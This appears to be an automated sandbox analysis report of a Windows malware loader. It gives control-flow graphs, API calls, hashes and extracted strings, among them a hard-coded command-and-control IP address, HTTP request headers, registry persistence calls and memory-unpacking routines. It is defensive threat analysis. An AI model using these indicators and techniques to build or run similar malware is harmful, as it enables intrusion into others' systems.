409b7c 665->671 672 405863-405871 665->672 673 405897-4058a3 666->673 674 4058bf-4058dc call 409a17 666->674 668->662 669->539 669->668 671->666 672->539 672->671 679 4058b5-4058bc call 409b7c 673->679 680 4058a5-4058b3 673->680 674->539 679->674 680->539 680->679 683->629 690 40567b-40568b call 403430 683->690 690->629 693 4056a7-4056bc 690->693 694 4056c2-4056ef 693->694 696 4056f1-4056fd 694->696 697 405703-405706 694->697 696->697 698 405708-405715 697->698 699 40571b-40571e 697->699 698->699 700 405720-405723 699->700 701 40572d-405730 699->701 702 405732-405734 700->702 703 405725-40572b 700->703 701->702 704 40573b-405762 Sleep 701->704 702->704 705 405736-405739 702->705 703->702 704->694 706 405768 704->706 705->704 707 40576a-40576f Sleep 705->707 706->627 707->627
                      APIs
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,79D989F6), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004050DD
                      • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                      • __Init_thread_footer.LIBCMT ref: 004053EB
                      • Sleep.KERNEL32(000007D0), ref: 00405755
                      • Sleep.KERNEL32(000007D0), ref: 0040576F
                      • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                      • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                      • API String ID: 606935701-1501174972
                      • Opcode ID: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                      • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                      • Opcode Fuzzy Hash: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                      • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99
                      Function 04798464 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1385 4798464-479847d 1386 479847f-4798481 1385->1386 1387 4798488-4798494 CreateToolhelp32Snapshot 1386->1387 1388 4798483 1386->1388 1389 47984a4-47984b1 Module32First 1387->1389 1390 4798496-479849c 1387->1390 1388->1387 1391 47984ba-47984c2 1389->1391 1392 47984b3-47984b4 call 4798123 1389->1392 1390->1389 1395 479849e-47984a2 1390->1395 1396 47984b9 1392->1396 1395->1386 1395->1389 1396->1391
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0479848C
                      • Module32First.KERNEL32(00000000,00000224), ref: 047984AC
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFirstModule32SnapshotToolhelp32
                      • String ID:
                      • API String ID: 3833638111-0
                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction ID: e2566512e86f89ba90c22dec4e3e596ea5bd6550231dc70b7a4f7e6d16353d7c
                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction Fuzzy Hash: 25F06236110711ABEB203FF5AC8CA6E76E8AF4A625F110528E642952D0DB74FC4546A2
                      Function 004087E0 Relevance: 2.5, Strings: 2, Instructions: 26COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1401 4087e0-408807 call 402460 * 2 call 405a50 1407 40880c-408816 call 4106ab 1401->1407
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: mixtwo$nosub
                      • API String ID: 3472027048-187875987
                      • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                      • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                      • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                      • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF
                      Function 00401830 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 106networkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                        • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                      Strings
                      • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                      • GET, xrefs: 004020E7
                      • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                      • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                      • text, xrefs: 00401B8F
                      • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                      • http://, xrefs: 00401EF4, 004021D3
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                      • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                      • API String ID: 2146599340-4172842843
                      • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                      • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                      • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                      • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4
                      Function 0494003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 728 494003c-4940047 729 494004c-4940263 call 4940a3f call 4940e0f call 4940d90 VirtualAlloc 728->729 730 4940049 728->730 746 4940265-4940289 call 4940a69 729->746 747 494028b-4940292 729->747 733 494004a 730->733 733->733 751 49402ce-49403c2 VirtualProtect call 4940cce call 4940ce7 746->751 749 49402a1-49402b0 747->749 750 49402b2-49402cc 749->750 749->751 750->749 758 49403d1-49403e0 751->758 759 49403e2-4940437 call 4940ce7 758->759 760 4940439-49404b8 VirtualFree 758->760 759->758 762 49405f4-49405fe 760->762 763 49404be-49404cd 760->763 766 4940604-494060d 762->766 767 494077f-4940789 762->767 765 49404d3-49404dd 763->765 765->762 772 49404e3-4940505 LoadLibraryA 765->772 766->767 768 4940613-4940637 766->768 770 49407a6-49407b0 767->770 771 494078b-49407a3 767->771 773 494063e-4940648 768->773 774 49407b6-49407cb 770->774 775 494086e-49408be LoadLibraryA 770->775 771->770 776 4940517-4940520 772->776 777 4940507-4940515 772->777 773->767 780 494064e-494065a 773->780 778 49407d2-49407d5 774->778 785 49408c7-49408f9 775->785 779 4940526-4940547 776->779 777->779 781 4940824-4940833 778->781 782 49407d7-49407e0 778->782 783 494054d-4940550 779->783 780->767 784 4940660-494066a 780->784 791 4940839-494083c 781->791 786 49407e4-4940822 782->786 787 49407e2 782->787 788 4940556-494056b 783->788 789 49405e0-49405ef 783->789 790 494067a-4940689 784->790 792 4940902-494091d 785->792 793 49408fb-4940901 785->793 786->778 787->781 794 494056d 788->794 795 494056f-494057a 788->795 789->765 796 4940750-494077a 790->796 797 494068f-49406b2 790->797 791->775 798 494083e-4940847 791->798 793->792 794->789 800 494057c-4940599 795->800 801 494059b-49405bb 795->801 796->773 802 49406b4-49406ed 797->802 803 49406ef-49406fc 797->803 804 4940849 798->804 805 494084b-494086c 798->805 812 49405bd-49405db 800->812 801->812 802->803 806 49406fe-4940748 803->806 807 494074b 803->807 804->775 805->791 806->807 807->790 812->783
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0494024D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: cess$kernel32.dll
                      • API String ID: 4275171209-1230238691
                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction ID: ddbb7b09f19d5ec3bf19675422a8a6ba8997af91244f1046b3b4109762b90cf0
                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction Fuzzy Hash: B4527A74A01229DFDB64CF58C984BACBBB5BF49304F1480E9E54DAB351DB30AA85DF14
                      Function 00405A50 Relevance: 11.2, APIs: 2, Strings: 5, Instructions: 678sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 813 405a50-406330 call 410822 call 4106e2 Sleep call 402760 * 2 call 403ab0 call 408ed0 call 408d80 * 3 call 406c40 call 408920 call 402460 call 408a70 call 402390 call 406ee0 call 4088e0 call 402460 call 408a70 call 402390 861 406404-40642f call 407290 call 4088e0 call 402460 call 408a70 call 402390 813->861 862 406336-4063ad call 406f60 call 4088e0 call 402460 call 4023e0 call 402390 call 406ff0 call 408900 call 402460 call 4023e0 call 402390 call 407070 call 408940 call 402460 call 408a70 call 402390 813->862 884 4064f3-40651e call 407630 call 4088c0 call 402460 call 408a70 call 402390 861->884 885 406435-4064ac call 407310 call 4088e0 call 402460 call 4023e0 call 402390 call 407390 call 408900 call 402460 call 4023e0 call 402390 call 407410 call 408940 call 402460 call 408a70 call 402390 861->885 954 4063cc-4063f7 call 407180 call 408940 call 402460 call 408a70 call 402390 862->954 955 4063af call 407100 862->955 918 406524-4065c1 call 4076b0 call 408920 call 402460 call 4023e0 call 402390 call 407730 call 408900 call 402460 call 4023e0 call 402390 call 4077b0 call 4088c0 call 402460 call 4023e0 call 402390 call 407830 call 4089c0 call 402460 call 408a70 call 402390 884->918 919 406608-406633 call 407a50 call 408890 call 402460 call 408a70 call 402390 884->919 1019 4064b8-4064e3 call 407520 call 408940 call 402460 call 408a70 call 402390 885->1019 1020 4064ae-4064b3 call 4074a0 885->1020 1147 4065c3-4065c8 call 4078c0 918->1147 1148 4065cd-4065f8 call 407940 call 4089c0 call 402460 call 408a70 call 402390 918->1148 966 4066b3-4066de call 407c70 call 408940 call 402460 call 408a70 call 402390 919->966 967 406635-4066ae call 407ae0 call 408900 call 402460 call 4023e0 call 402390 call 407b60 call 408940 call 402460 call 4023e0 call 402390 call 407bf0 call 4088c0 call 402460 call 4023e0 call 402390 919->967 1016 40687d-4069df call 4017a0 call 4083f0 call 408940 call 402460 call 408370 call 408920 call 402460 call 4082d0 call 4089a0 call 402460 call 408da0 call 408e00 call 408eb0 call 408e00 call 408eb0 call 408e00 call 402390 * 8 954->1016 1022 4063fd-406402 call 407210 954->1022 965 4063b4-4063c7 call 408920 call 402460 955->965 992 40686f-406878 call 4023e0 call 402390 965->992 1033 4066e0-406759 call 407d00 call 408900 call 402460 call 4023e0 call 402390 call 407d80 call 408920 call 402460 call 4023e0 call 402390 call 407e00 call 4088c0 call 402460 call 4023e0 call 402390 966->1033 1034 40675e-406789 call 407e80 call 408970 call 402460 call 408a70 call 402390 966->1034 967->1016 992->1016 1251 4069e5-4069fe call 402350 call 4021d0 1016->1251 1019->1016 1090 4064e9-4064ee call 4075b0 1019->1090 1020->965 1022->965 1033->1016 1099 40678b-4067dc call 407f10 call 408900 call 402460 call 4023e0 call 402390 call 407fd0 call 4088c0 call 402460 call 4023e0 call 402390 call 408050 1034->1099 1100 4067de-406809 call 4080d0 call 4088c0 call 402460 call 408a70 call 402390 1034->1100 1090->884 1224 40685c-40686c call 4088c0 call 402460 1099->1224 1100->1016 1166 40680b-406857 call 408150 call 408900 call 402460 call 4023e0 call 402390 call 4081d0 call 408920 call 402460 call 4023e0 call 402390 call 408250 1100->1166 1147->1148 1148->1016 1206 4065fe-406603 call 4079d0 1148->1206 1166->1224 1206->919 1224->992 1256 406a00-406a23 call 402210 call 402460 call 4025e0 1251->1256 1257 406a3e-406a45 Sleep 1251->1257 1256->1257 1264 406a47-406a9c call 402390 call 408c80 * 3 call 404f70 1256->1264 1257->1251
                      APIs
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,79D989F6), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                      • API String ID: 2563648476-311857291
                      • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                      • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                      • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                      • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9
                      Function 00401E50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1274 401e50-401e9e 1275 401ea0-401ea5 1274->1275 1275->1275 1276 401ea7-402179 call 402760 * 2 call 40aff0 call 40d0f0 InternetOpenA 1275->1276 1289 4021a3-4021c0 call 409a17 1276->1289 1290 40217b-402187 1276->1290 1291 402199-4021a0 call 409b7c 1290->1291 1292 402189-402197 1290->1292 1291->1289 1292->1291 1294 4021c8-4021f9 call 40cfef call 401e50 1292->1294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: http://
                      • API String ID: 0-1121587658
                      • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                      • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                      • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                      • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94
                      Function 00413CB9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1303 413cb9-413cc5 1304 413cf7-413d02 call 40d0dd 1303->1304 1305 413cc7-413cc9 1303->1305 1312 413d04-413d06 1304->1312 1306 413ce2-413cf3 RtlAllocateHeap 1305->1306 1307 413ccb-413ccc 1305->1307 1309 413cf5 1306->1309 1310 413cce-413cd5 call 412473 1306->1310 1307->1306 1309->1312 1310->1304 1315 413cd7-413ce0 call 4116b2 1310->1315 1315->1304 1315->1306
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID: 5(@
                      • API String ID: 1279760036-4133491027
                      • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                      • Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
                      • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                      • Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED
                      Function 005F8038 Relevance: 3.1, APIs: 2, Instructions: 113registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1318 5f8038-5f8046 1319 5f7fc9-5f7fdc 1318->1319 1320 5f8048 1318->1320 1321 5f896e-5fd25e 1319->1321 1320->1321 1327 5fd287-5fd2a2 RegOpenKeyA 1321->1327 1328 5fd260-5fd27b RegOpenKeyA 1321->1328 1330 5fd2ba-5fd32a 1327->1330 1331 5fd2a4-5fd2ae 1327->1331 1328->1327 1329 5fd27d 1328->1329 1329->1327 1335 5fd33d 1330->1335 1336 5fd330-5fd337 1330->1336 1331->1330 1335->1335 1336->1335
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?,?,56168394), ref: 005FD273
                      • RegOpenKeyA.ADVAPI32(80000002,?,?,?,56168394), ref: 005FD29A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F6000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f6000_file.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 80307973130d41a80046e1f2bd0dae78c5c6cafd3740d80b3c38f255badbf094
                      • Instruction ID: 48fbc9dc994a6babf73538509380d856d625f0132013bb611eb12667619b224c
                      • Opcode Fuzzy Hash: 80307973130d41a80046e1f2bd0dae78c5c6cafd3740d80b3c38f255badbf094
                      • Instruction Fuzzy Hash: A041BCB100C64E9FEB12DF24C848BEE7FB1FF05314F19052AEA8086942D6354CA5CB9A
                      Function 005F8968 Relevance: 3.1, APIs: 2, Instructions: 102registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1337 5f8968-5fd25e 1344 5fd287-5fd2a2 RegOpenKeyA 1337->1344 1345 5fd260-5fd27b RegOpenKeyA 1337->1345 1347 5fd2ba-5fd32a 1344->1347 1348 5fd2a4-5fd2ae 1344->1348 1345->1344 1346 5fd27d 1345->1346 1346->1344 1352 5fd33d 1347->1352 1353 5fd330-5fd337 1347->1353 1348->1347 1352->1352 1353->1352
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?,?,56168394), ref: 005FD273
                      • RegOpenKeyA.ADVAPI32(80000002,?,?,?,56168394), ref: 005FD29A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F6000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f6000_file.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 481e607dad6f910b6bd2e966dbd970ef5cbab0f3d9c9a4b0a50b6f14ce8bc573
                      • Instruction ID: 7904bc8ab372ade3de7c033c14e48868bcfcec26ddfe4398809409b50504660f
                      • Opcode Fuzzy Hash: 481e607dad6f910b6bd2e966dbd970ef5cbab0f3d9c9a4b0a50b6f14ce8bc573
                      • Instruction Fuzzy Hash: E0419DB100C64E9FEB12DF14C848BEE7FB5EF45310F15052AEA8086941D7394CA5DB9A
                      Function 005F907E Relevance: 3.1, APIs: 2, Instructions: 90registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1354 5f907e-5fd25e 1360 5fd287-5fd2a2 RegOpenKeyA 1354->1360 1361 5fd260-5fd27b RegOpenKeyA 1354->1361 1363 5fd2ba-5fd32a 1360->1363 1364 5fd2a4-5fd2ae 1360->1364 1361->1360 1362 5fd27d 1361->1362 1362->1360 1368 5fd33d 1363->1368 1369 5fd330-5fd337 1363->1369 1364->1363 1368->1368 1369->1368
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?,?,56168394), ref: 005FD273
                      • RegOpenKeyA.ADVAPI32(80000002,?,?,?,56168394), ref: 005FD29A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F6000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f6000_file.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 0487bd14be10b5ebd1fc9c1aa4db36e33269615a8f0080f1fa83cc38ce7634ac
                      • Instruction ID: b7b363cfb03acb5e6bbd71967464bcd2fe73b69cf164a7b2aeec89086ea859e1
                      • Opcode Fuzzy Hash: 0487bd14be10b5ebd1fc9c1aa4db36e33269615a8f0080f1fa83cc38ce7634ac
                      • Instruction Fuzzy Hash: 3F31AEB101864E9FEB12DF10C848BEE7FB2FF05310F15056AEA8086942D7394CA5CF99
                      Function 005F96FE Relevance: 3.1, APIs: 2, Instructions: 87registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1370 5f96fe-5fd25e 1375 5fd287-5fd2a2 RegOpenKeyA 1370->1375 1376 5fd260-5fd27b RegOpenKeyA 1370->1376 1378 5fd2ba-5fd32a 1375->1378 1379 5fd2a4-5fd2ae 1375->1379 1376->1375 1377 5fd27d 1376->1377 1377->1375 1383 5fd33d 1378->1383 1384 5fd330-5fd337 1378->1384 1379->1378 1383->1383 1384->1383
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?,?,56168394), ref: 005FD273
                      • RegOpenKeyA.ADVAPI32(80000002,?,?,?,56168394), ref: 005FD29A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F6000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f6000_file.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 1e00a574bd770175c78ffcd661cecf7e28f2e5479c8b790c99a60d5079ccc26a
                      • Instruction ID: 27f28b31e370b61afee47f190c2739beb899321996b50ea6b751c2cd1ee8a634
                      • Opcode Fuzzy Hash: 1e00a574bd770175c78ffcd661cecf7e28f2e5479c8b790c99a60d5079ccc26a
                      • Instruction Fuzzy Hash: 7C31C1B100824E9FEB12DF10C8487EE7FB2EF05310F15016AEA8086941D7354CA5CF99
                      Function 04940E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1398 4940e0f-4940e24 SetErrorMode * 2 1399 4940e26 1398->1399 1400 4940e2b-4940e2c 1398->1400 1399->1400
                      APIs
                      • SetErrorMode.KERNEL32(00000400,?,?,04940223,?,?), ref: 04940E19
                      • SetErrorMode.KERNEL32(00000000,?,?,04940223,?,?), ref: 04940E1E
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction ID: 98d9a3b77034ec0415020b3f8d752fb2f2c3dff89f97121a55313444d61b48f8
                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction Fuzzy Hash: 4FD0123114512877D7002A94DC0DBCE7B1CDF05B62F008021FB0DD9080C770964046E5
                      Function 005F96BD Relevance: 1.5, APIs: 1, Instructions: 13libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1410 5f96bd-5f96d3 LoadLibraryA 1411 5fb40a-5fb416 1410->1411
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F6000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f6000_file.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: b22f91a167eafc61fe6f14e174f9856a1d337fb17b57a749ff7498772b8f89e4
                      • Instruction ID: e78a740e74b7050d33c0d4e577365d907186ea1433240c183cb63f25a21318da
                      • Opcode Fuzzy Hash: b22f91a167eafc61fe6f14e174f9856a1d337fb17b57a749ff7498772b8f89e4
                      • Instruction Fuzzy Hash: B7D0C9F540C608DBD704AF58D808A3ABAE9AB18300F010E1CBFC583350E63918609B5B
                      Function 04798123 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1412 4798123-479815d call 4798436 1415 47981ab 1412->1415 1416 479815f-4798192 VirtualAlloc call 47981b0 1412->1416 1415->1415 1418 4798197-47981a9 1416->1418 1418->1415
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04798174
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction ID: 3a8a135cfd3c209053a50b5584947d4b1d8406fe23487f1b01be3a0bf574a5ba
                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction Fuzzy Hash: AF113C79A40208EFDB01DF98C985E98BBF5AF08350F058094F9489B361D371EA90DF81

                      Non-executed Functions

                      Function 04943FA7 Relevance: 45.6, APIs: 20, Strings: 5, Instructions: 1839sleepcomCOMMON
                      Download Yara Rule
                      APIs
